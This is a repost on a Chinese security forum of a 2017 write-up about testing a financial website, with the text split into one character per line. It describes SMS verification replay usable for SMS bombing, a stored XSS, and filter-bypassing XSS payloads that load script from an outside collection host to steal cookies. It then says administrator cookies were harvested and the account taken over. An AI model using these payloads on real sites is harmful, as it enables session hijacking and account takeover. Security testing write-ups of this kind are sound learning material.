论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
IOT
[19178] 2017-12-12_日常练手:某网站XSS安全测试回顾
文档创建者:
s7ckTeam
浏览次数:
3
最后更新:
2025-01-18
IOT
3 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2017-12-12_日常练手:某网站XSS安全测试回顾
挖
洞
技
巧
要
多
练
,
维
护
网
络
安
全
要
及
时
提
交
厂
商
漏
洞
,
所
以
我
会
在
厂
商
修
复
漏
洞
后
,
把
日
常
练
手
的
经
历
、
思
路
分
享
给
大
家
,
也
希
望
大
家
能
够
多
多
分
享
你
们
的
思
路
,
分
享
才
是
我
们
学
习
成
长
、
促
进
网
络
安
全
的
首
要
因
素
。
日
常
练
手
:
某
网
站
X
S
S
安
全
测
试
回
顾
i
春
秋
2
0
1
7
-
1
2
-
1
2
作
者
:
风
在
指
尖
i
春
秋
社
区
现
在
对
某
网
站
进
行
一
个
漏
洞
挖
掘
,
金
融
系
的
网
站
,
这
种
网
站
一
般
漏
洞
比
较
多
,
一
般
这
种
网
站
,
都
会
有
逻
辑
漏
洞
,
X
S
S
漏
洞
,
所
以
我
们
先
从
逻
辑
漏
洞
找
起
对
他
的
一
个
短
信
接
口
进
行
测
试
,
看
看
能
不
能
绕
过
限
制
时
间
,
接
口
重
放
,
账
号
密
码
找
回
,
支
付
订
单
等
,
等
。
。
。
。
对
他
的
发
送
短
信
数
据
进
行
抓
包
。
这
里
我
给
我
的
手
机
号
发
送
验
证
码
,
抓
包
拦
截
右
击
-
&
g
t
;
重
放
,
然
后
不
断
的
重
放
,
重
放
可
以
看
到
,
这
里
写
了
s
u
c
c
e
s
s
,
成
功
了
结
果
是
不
断
的
发
消
息
消
息
可
以
看
到
,
验
证
码
完
全
失
效
,
并
且
可
以
不
断
的
重
发
,
不
断
的
重
发
可
以
拿
来
短
信
轰
炸
!
!
!
!
!
之
后
我
又
在
各
个
输
出
点
,
输
入
点
找
,
个
人
介
绍
,
资
料
,
地
址
,
这
里
是
重
大
灾
区
~
~
~
~
~
~
在
个
人
介
绍
的
表
单
处
,
进
行
测
试
个
人
介
绍
有
存
储
X
S
S
漏
洞
存
在
P
a
y
l
o
a
d
为
“
o
n
m
o
u
s
e
o
v
e
r
=
a
l
e
r
t
”
”
/
/
这
个
p
a
y
l
o
a
d
的
意
思
大
致
是
“
为
闭
合
掉
表
单
前
面
的
引
号
o
n
m
o
u
s
e
o
v
e
r
=
a
l
e
r
t
”
”
触
摸
即
弹
窗
/
/
注
释
掉
后
面
的
语
法
然
后
提
交
数
据
包
刷
新
后
,
可
以
看
到
弹
窗
了
,
证
明
有
X
S
S
漏
洞
,
但
是
无
奈
,
没
有
人
会
无
缘
无
故
的
去
看
你
的
个
人
介
绍
啊
,
这
又
不
是
约
炮
网
站
~
~
~
~
~
~
所
以
我
就
一
直
找
啊
找
,
找
啊
找
,
找
到
在
一
个
文
章
发
布
的
地
方
也
有
漏
洞
在
介
绍
处
输
入
字
符
,
然
后
抓
包
截
取
P
a
y
l
o
a
d
为
<
/
t
e
x
t
a
r
e
a
>
<
s
v
g
/
o
n
l
o
a
d
=
a
l
e
r
t
`
`
>
/
/
<
s
v
g
/
o
n
l
o
a
d
=
"
s
=
c
r
e
a
t
e
E
l
e
m
e
n
t
(
'
s
c
r
i
p
t
'
)
;
b
o
d
y
.
a
p
p
e
n
d
C
h
i
l
d
(
s
)
;
s
.
s
r
c
=
'
h
t
t
p
:
/
/
x
s
s
.
f
b
i
s
b
.
c
o
m
/
1
T
j
I
'
"
;
/
>
试
试
结
果
是
返
回
的
是
h
t
t
p
:
后
面
的
被
过
滤
了
,
那
么
我
们
就
换
个
p
a
y
l
o
a
d
对
其
进
行
J
S
编
码
<
s
v
g
/
o
n
l
o
a
d
=
"
s
=
c
r
e
a
t
e
E
l
e
m
e
n
t
(
'
s
c
r
i
p
t
'
)
;
b
o
d
y
.
a
p
p
e
n
d
C
h
i
l
d
(
s
)
;
s
.
s
r
c
=
'
1
5
0
1
6
4
1
6
4
1
6
0
7
2
5
7
5
7
1
7
0
1
6
3
1
6
3
5
6
1
4
6
1
4
2
1
5
1
1
6
3
1
4
2
5
6
1
4
3
1
5
7
1
5
5
5
7
6
1
1
2
4
1
5
2
1
1
1
'
"
;
/
>
结
果
站
点
说
只
能
输
入
1
0
0
个
字
啊
我
们
输
入
<
/
t
e
x
t
a
r
e
a
>
<
s
v
g
/
o
n
l
o
a
d
=
"
s
=
c
r
e
a
t
e
E
l
e
m
e
n
t
(
'
s
c
r
i
p
t
'
)
;
b
o
d
y
.
a
p
p
e
n
d
C
h
i
l
d
(
s
)
;
s
.
s
r
c
=
'
1
5
0
1
6
4
1
6
4
1
6
0
7
2
5
7
5
7
1
7
0
1
6
3
1
6
3
5
6
1
4
6
1
4
2
1
5
1
1
6
3
1
4
2
5
6
1
4
3
1
5
7
1
5
5
5
7
6
1
1
2
4
1
5
2
1
1
1
'
"
;
/
>
<
/
t
e
x
t
a
r
e
a
>
这
是
闭
合
它
的
标
签
,
然
后
输
入
我
们
的
代
码
,
最
后
由
&
l
t
;
s
p
a
n
&
g
t
;
标
签
包
裹
输
入
出
来
,
但
是
s
p
a
n
标
签
里
只
能
有
1
0
0
个
字
符
,
所
以
我
想
了
想
,
可
以
不
可
以
不
闭
合
t
e
x
t
a
r
e
a
标
签
直
接
闭
合
s
p
a
n
标
签
那
么
代
码
就
是
<
/
s
p
a
n
>
<
s
v
g
/
o
n
l
o
a
d
=
"
s
=
c
r
e
a
t
e
E
l
e
m
e
n
t
(
'
s
c
r
i
p
t
'
)
;
b
o
d
y
.
a
p
p
e
n
d
C
h
i
l
d
(
s
)
;
s
.
s
r
c
=
'
h
t
t
p
:
/
/
x
s
s
.
f
b
i
s
b
.
c
o
m
/
1
T
j
I
'
"
;
/
>
还
是
不
行
,
我
就
不
相
信
不
能
构
造
了
,
说
长
度
限
制
,
那
么
我
自
己
构
造
一
个
短
的
试
试
,
先
测
试
下
到
底
过
滤
哪
里
了
<
/
s
p
a
n
>
<
s
v
g
/
o
n
l
o
a
d
=
"
s
=
c
r
e
a
t
e
E
l
e
m
e
n
t
(
'
s
c
r
i
p
t
'
)
;
b
o
d
y
.
a
p
p
e
n
d
C
h
i
l
d
(
s
)
;
s
.
s
r
c
=
'
h
t
t
p
:
/
/
1
1
1
1
1
'
"
;
/
>
回
显
是
慢
慢
看
,
到
底
吧
什
么
字
符
换
成
*
*
了
<
/
s
p
a
n
>
<
s
v
g
/
o
n
l
o
a
d
=
"
s
=
c
r
e
a
t
e
E
l
e
m
e
n
t
(
'
s
c
r
i
p
t
'
)
;
b
o
d
y
.
a
p
p
e
n
d
C
h
i
l
d
(
s
)
;
s
.
s
r
c
=
'
h
t
t
p
:
/
/
x
s
s
.
1
1
'
"
;
/
>
回
显
再
试
试
这
个
<
/
s
p
a
n
>
<
s
v
g
/
o
n
l
o
a
d
=
"
s
=
c
r
e
a
t
e
E
l
e
m
e
n
t
(
'
s
c
r
i
p
t
'
)
;
b
o
d
y
.
a
p
p
e
n
d
C
h
i
l
d
(
s
)
;
s
.
s
r
c
=
'
h
t
t
p
:
/
/
x
s
s
.
f
b
i
s
b
.
c
o
m
'
"
;
/
>
结
果
显
示
难
不
成
过
滤
了
.
c
o
m
?
我
的
猜
测
,
试
试
看
输
入
这
个
试
试
<
/
s
p
a
n
>
<
s
v
g
/
o
n
l
o
a
d
=
"
s
=
c
r
e
a
t
e
E
l
e
m
e
n
t
(
'
s
c
r
i
p
t
'
)
;
b
o
d
y
.
a
p
p
e
n
d
C
h
i
l
d
(
s
)
;
s
.
s
r
c
=
'
h
t
t
p
:
/
/
x
s
s
.
1
.
c
o
m
'
"
;
/
>
结
果
显
示
现
在
我
不
输
入
.
c
o
m
结
尾
的
x
s
s
站
点
试
试
还
是
不
行
,
又
限
制
长
度
字
符
,
又
过
滤
某
个
字
符
,
我
去
!
!
后
来
经
过
上
百
次
测
试
,
我
终
于
想
出
来
,
只
需
要
编
码
U
R
L
里
的
单
个
字
符
即
可
P
a
y
l
a
o
d
为
,
这
个
是
盗
取
c
o
o
k
i
e
的
<
s
v
g
/
o
n
l
o
a
d
=
"
s
=
c
r
e
a
t
e
E
l
e
m
e
n
t
(
'
s
c
r
i
p
t
'
)
;
b
o
d
y
.
a
p
p
e
n
d
C
h
i
l
d
(
s
)
;
s
.
s
r
c
=
'
h
t
t
p
:
/
/
x
s
s
.
t
1
6
6
5
7
1
3
0
1
0
1
'
"
;
/
>
拿
到
一
个
客
服
的
和
管
理
员
的
c
o
o
k
i
e
可
以
看
到
,
这
个
管
理
员
的
名
字
叫
什
么
什
么
网
小
助
手
,
名
字
是
不
能
更
改
的
现
在
绑
定
邮
箱
,
然
后
再
修
改
密
码
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
IOT